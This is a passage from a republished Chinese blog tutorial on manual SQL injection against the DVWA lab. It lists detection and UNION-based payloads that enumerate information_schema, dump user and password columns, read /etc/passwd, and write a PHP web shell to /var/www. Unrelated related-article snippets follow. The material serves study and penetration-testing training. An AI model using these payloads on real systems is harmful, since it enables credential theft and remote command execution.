kali linux之手动漏洞挖掘三（sql注入）

2023-10-30

服务器端程序将用户输入作为参数作为查询条件，直接拼写sql语句，并将结果返回给客户端浏览器

如判断登录

select * from users where user='uname' and password='pass'

select * from users where user='name' and password="or"=''

基于报错的检测方法：

' " %

查看代码id那里有两个单引号，再插入一个单引号，带入查询了，就可以构造自定义的sql语句

基于布尔的检测：

1' and '1'='1或1' and '1

1'and'1'='2 或1' and '0

表列数/显示信息位于哪一列：

'order by 3-- #按查询列号排序（-- 注释符）

如果猜测不对会返回报错

猜到第二列没返回，说明在第二列

联合查询：

' union select 1,2--

查到对应信息后，查看db用户-----user() db版本----version() 当前数据库---database()

函数@@datadir--数据库路径 @@hostname--主机名 @@version--数据库版本信息 @@version_compile_os--系统主机版本

查看数据库版本和用户

查看当前数据库

查看数据库路径

mysql数据结构------infomation_schema所有信息都在这个库里面

查看所有的库，和所有的表

' union select table_name,table_schema from information_schema.tables--

统计每个表中的数量

'union select table_schema,count(*) from information_Schema.tables group by table_schema--

查看dvwa库中的表名

' union select table_name,table_schema from information_schema.tables where table_schema='dvwa'--

查看dvwa表中的所有列

' union select table_name,table_schema from information_schema.tables where table_schema='dvwa' and table_name='users'--

查询dvwa表中的user password列的内容

' union select user,password from dvwa.users--

读取文件

' union select null,load_file('/etc/passwd')--

写入文件（写入木马什么的,前提是要有www目录的写权限）

' union select null,"<?php passthru($_GET['cmd']);?>" into dumpfile"/var/www/xxsec.php"--

然后执行命令

如果没有权限的话，可以配合文件包含漏洞，把文件写到tmp目录下，利用文件包含来执行命令

sql盲注

不显示数据库内建的报错信息，报错信息提供关于系统的大量有用信息

当报错信息隐藏了，或者替换为通用的错误提示，sql注入无法根据报错信息判断语句的执行结果，即盲

思路：无法基于报错结果判断，那就基于逻辑真假的不同结果来判断

1' and 1=1-- （结果为真，返回执行了）

1' and 1=2--（结果为假的时候，没有任何返回，说明逻辑语句被执行了）

1' order by 2-- 查询有两个字段

1' union select 1,2-- 联合查询

1' and 1=0 union select null,table_name from information_schema.tables--

1' and 1=0 union select null,table_name from information_schema.columns where table_name='users'--

友情链接 http://www.cnblogs.com/klionsec

http://www.cnblogs.com/l0cm

http://www.cnblogs.com/Anonyaptxxx

http://www.feiyusafe.cn

转载于:https://www.cnblogs.com/Hydraxx/p/10461965.html

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

操作系统

数据库

php

kali linux之手动漏洞挖掘三（sql注入）的相关文章

php 打印 aa aaa ab aab 直到 zzz 的算法

你好我需要打印从 a 到 zzz 最多 3 个字母例如我的输出应该是 A B Z AA AB AZ BA BB ZZ AAA AAB ZZZ 我在过去的 5 个小时里努力尝试我找不到任何逻辑我尝试了下面的代码 PHP 有一个方便的功
使用 .htaccess 启用 PHP 短标签

我在自己的 Centos 服务器上设置了 Apache 并具有多个虚拟 Web 服务器并且我希望仅为位于以下位置的其中一个 Web 服务器启用 PHP 短标记 var www ostickets html 我可以通过添加成功启用短标签sh
使用 PDO 准备语句使用搜索字段中的多个关键字进行 LIKE 查询

网站用户使用搜索表单来查询产品数据库输入的关键字在数据库中搜索产品的标题 public function startSearch keywords keywords preg split s keywords totalKeywords
PMA 4.5.2.0 file_exists()：open_basedir 限制生效

从 PPA 在我的 Ubuntu 服务器上安装 phpMyAdmin 后 https launchpad net nijel archive ubuntu phpmyadmin https launchpad net nijel archi
为什么当尝试使用 $this->data 访问 CakePHP 时，密码字段为空？

我正在实现一个身份验证组件这是我的注册页面 create User array action gt login echo form gt input primary email array size gt 32 echo form gt
PHP上传文件产生错误代码4。为什么？

HTML
从twitter api实体参数php获取图像url

我正在尝试通过实体参数使用 php 获取并显示在推文中发布的图像我的 url 中有 include entities 可以看到返回的 json 中的实体在我的 foreach 循环中我正在执行以下操作 foreach results
基本表创建 fpdf

我找不到使用 fpdf 制作表格并从 mysql 数据库获取数据的合适教程我只是想知道如何创建一个我在网上尝试示例时遇到了很多错误例如我有名字中间名姓氏年龄和电子邮件列如何使用 fpdf 创建表格并回显数据库中的条目
如何比较两个字符串的大小写和变音符号不敏感？

我有两根弦字符串 1 塞巴斯蒂安字符串 2 塞巴斯蒂安我想通过忽略重音字符来比较这两个字符串谁能知道这个逻辑吗提前致谢
将 PHP mcrypt 与 Rijndael/AES 结合使用

我正在尝试使用 php 中的 mcrypt 和密码 Rijndael 加密一些文本消息但我不确定 MCRYPT MODE modename 根据 PHP 手册这些可用 ecb cbc cfb ofb nofb 或 stream 但我读到
Facebook 中用户的时区是如何编码的

我需要检查用户的时区但我找不到它的真正定义参考API http developers facebook com docs reference api user says 用户的时区与 UTC 的偏移量现在在维基百科上这些是可能的时区
Facebook Graph API v3.1 开发人员访问令牌权限限制

如您所知 Facebook 将其 API 升级到了 V3 1 现在正在慢慢地淘汰旧的 API 和应用程序因此我们必须迁移到新的 API 他们做出了一些艰难的决定这对垃圾邮件网站来说是好事但对开发人员来说也很难提醒 Graph API
PHP 相等变量

我想知道是否有任何方法可以检查大量变量是否相等如果我只有几个变量我可以这样做 if a b a c b c 但是如果我有 20 个变量则需要一些时间来编写所有组合还有其他方法吗 if count array unique arra
如何在无法重启的服务器（Apache）上使用gettext？

我在服务器故障上问了这个问题 https serverfault com questions 104224 how do you use gettext on server apache you cant restart但我没有得到任何回应
在 Apache 服务器上将特定的 .htm 页面处理为 .php [重复]

这个问题在这里已经有答案了我正在为 Apache 服务器编程并且只需要将一个特定的 html 页面例如 first htm 作为 PHP 脚本进行处理可以设置吗 SetHandler http httpd apache org do
隐藏产品价格和添加到购物车按钮，但不隐藏 WooCommerce 中未注册用户的变体

在我的 WooCommerce 商店中我想隐藏价格直到客户登录为止我有以下代码可以实现这一点 add action init hide price function hide price if is user logged in re
高效插入和更新时检查唯一性

我的员工表中有 2 列每列值必须是唯一的 staff code staff name staff id staff code staff name 1 MGT Management 2 IT IT staff 当向表中插入或更新项目时我
PHP 文件服务脚本：下载不可靠？

这篇文章最初是关于 ServerFault 的一个问题 https serverfault com questions 131156 user receiving partial downloads https serverfault co
无法与站点通信以检查致命错误

无法与站点通信以检查致命错误因此 PHP 更改已恢复您需要通过其他方式上传 PHP 文件更改例如使用 SFTP 有什么解决办法我正在 WordPress 中编辑头文件遇到这个问题尝试这个我有同样的问题并决定调查一下更改 wp
如何显示 PHP 对象

我有这样的代码 dataRecord1 client gt GetRecord token table filter echo pre print r dataRecord1 echo pre foreach dataRecord1 gt

随机推荐

unity3d关节物体连接方式 Joint 简介

Unity3D 在components physics里有很多种Joint方式用于模拟物体与物体间的联系物体间作用力等由于上次辛苦写了一堆没成功保存后这次就不写那么详细了做个引子真的用到的时候大家可以查官网再做具体研究 Hing
花生壳PHTunnel嵌入Openwrt实例

下载下载自己的编译平台的二进制PHTunnel文件是第一步要做的我们可以到贝锐科技开放平台网站 https developer oray com sdk 进行下载根据自己的型号进行下载比如我的路由器是基于mipsel c库使用的是u
你值得拥有——流星雨下的告白（Python实现）

目录 1 前言 2 霍金说移民外太空 3 浪漫的流星雨展示 4 Python代码 1 前言我们先给个小故事提一下大家兴趣然后我给出论据得出结论最后再浪漫的流星雨表白代码奉上还有我自创的一首诗开始啦 2 霍金说移民外太空霍金说
Python-继承

单继承多继承面向对象三大特性封装根据职责将属性和方法封装到一个抽象的类中继承实现代码的重用相同的代码不需要重复的缩写多态不同的对象调用相同的方法产生不同的执行结果增加代码的灵活度 1 单继承 1 1继承的概念语法和特点继
mysql批量插入、更新

1 创建表 CREATE TABLE user id int 11 UNSIGNED NOT NULL AUTO INCREMENT COMMENT id name varchar 255 CHARACTER SET utf8 COLLAT
mysql 安装教程(详细说明)

如果你装过一定要先卸载干净并且重启重新装卸载教程保证成功 https www cnblogs com qzhc p 11354678 html 大家都知道MySQL是一款中小型关系型数据库管理系统很具有实用性对于我们学习很多技
SpringBoot的ApplicationRunner

场景在开发过程中需要在容器启动的时候查询数据库将数据加载到程序中代码 Component Slf4j RequiredArgsConstructor public class InitAppRunner implements App
monaco-editor基本使用以及monaco-editor封装成vue组件

文章目录一 monaco editor基本使用二 monaco editor封装成vue组件一 monaco editor基本使用以vue2项目为例安装依赖 npm i monaco editor npm i monaco edi
Redis知识总结

Redis的全称是 Remote Dictionary Server Redis是一个开源 BSD许可内存数据结构存储可以用作数据库缓存和消息代理它支持数据结构如字符串散列列表集合带有范围查询的排序集位图超级日志具有
unity3D 鼠标滚轮实现物体的大小缩放

这个实现的方法不难难的可能是要弄懂鼠标滚轮响应函数的机制响应函数是Input GetAxis Mouse ScrollWheel 其中这个函数是有返回值的类型是float 向前滚是返回正数向后滚是返回负数所以下面这个脚本操作的
域名系统和 DNS

目录 1 名字解析介绍和DNS 1 2 DNS服务工作原理 1 3 DNS查询类型 1 4 名称服务器 1 5 解析类型 1 6 完整的查询请求经过的流程 2 DNS 服务相关概念和技术 2 1 DNS服务器的类型 2 1 1 主DNS服务
人工智能知识全面讲解：机器学习的过程

1 3 1 机器学习的三个阶段学习了机器学习的概念后我们知道机器学习实际上就是计算机通过算法处理数据并且学得模型的过程模型这个词经常被我们挂在嘴边但大部分人仍然不清楚模型是怎么做出来的模型在计算机里是怎么表示的对模型很难
linux中的无人职守安装脚本kickstart

一 kickstart自动安装脚本的作用在企业中安装多台操作系统时面临的问题当安装Linux操作系统时安装过程会需要回答很多关于设定的问题这些问题必须手动选择否则无法进行安装当只安装1台Linux系统手动选择设定工作量比较轻松
使用Go语言实现百度网盘样的云存储系统

目录 1 项目概述 2 开始项目 3 用户服务 4 文件服务 5 结语欢迎来到这篇关于使用Go语言实现云存储系统的博客在这篇博客中我们将讨论如何使用Go语言和一些常见的开源库实现一个简单的云存储系统这个系统将包含用户注册登录上
m1 mac 使用 obs + BlackHole 内录电脑音频

直接 obs 是内录不了的由于 macOS 的限制无法获取桌面音频于是使用 BlackHole Github 工具该方案的原理是将电脑音频同时输出到你的设备耳机扬声器等 BlackHole 然后让 OBS 获取 BlackHol
Lambda表达式【C++语法】

C L a m b d a
测试驱动开发（TDD）实践与技巧

文章目录引言 Google Mock 测试用例结构断言经典式断言 Hamcrest 断言测试驱动开发第一个示例开场白开始吧去掉不干净的代码增量性 fixture 设置思索与测试驱动开发测试驱动与测试测试驱动开发基础与
Android app多渠道打包的流程与源代码示例

Android app多渠道打包的流程与源代码示例多渠道打包是指通过一次构建过程生成适用于不同应用商店市场或渠道的多个APK文件这样可以方便开发者将应用同时发布到多个平台上提高应用的覆盖率和下载量本文将介绍实现多渠道打包的步骤并
静态路由实验（思科Cisco）

思科静态配置命令静态路由的配置命令如下 router config ip route 目的网络网络掩码下一跳地址出接口默认路由的配置命令如下 router config ip route 0 0 0 0 0 0 0 0 下一跳地址
kali linux之手动漏洞挖掘三（sql注入）

服务器端程序将用户输入作为参数作为查询条件直接拼写sql语句并将结果返回给客户端浏览器如判断登录 select from users where user uname and password pass select from use

kali linux之手动漏洞挖掘三（sql注入）

kali linux之手动漏洞挖掘三（sql注入） 的相关文章

随机推荐

热门标签

kali linux之手动漏洞挖掘三（sql注入）的相关文章